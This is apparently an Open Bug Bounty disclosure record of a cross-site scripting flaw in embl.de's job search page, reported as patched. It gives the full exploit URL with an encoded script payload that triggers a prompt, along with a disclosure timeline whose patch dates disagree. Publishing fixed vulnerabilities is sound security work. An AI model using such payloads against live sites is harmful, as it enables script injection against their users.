embl.de XSS vulnerability

2017-11-27T20:05:00
ID OBB:440118
Type openbugbounty
Reporter deb_security
Modified 2017-12-28T08:43:00

Description

Vulnerable URL:
https://www.embl.de/jobs/searchjobs/index.php?ref=EBI_01086&newlang;=1&b;=%22%3E%3Csvg%3E%3Cscript%3E/%3C@/%3Eprompt(/OPENBUGBOUNTY/)%3C/script%3E%2Fjobs%2Fsearchjobs%2Findex.php%3Fnewlang%3D%2522%253E1%26loc%3D0%26pos[]%3D0%26srch_trm%3D%26list%3DSearch
Details:

Description| Value
---|---
Patched:| Yes, at 29.11.2017
Latest check for patch:| 29.11.2017 12:34 GMT
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 60048
VIP website status:| No

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 27 November, 2017 20:05 GMT
Generic security notifications sent to website owner| 27 November, 2017 20:08 GMT
Notification sent to subscribers (without technical details)| 27 November, 2017 22:17 GMT
Vulnerability details disclosed by researcher| 27 December, 2017 20:24 GMT
Vulnerability patched by the website owner| 28 December, 2017 08:43 GMT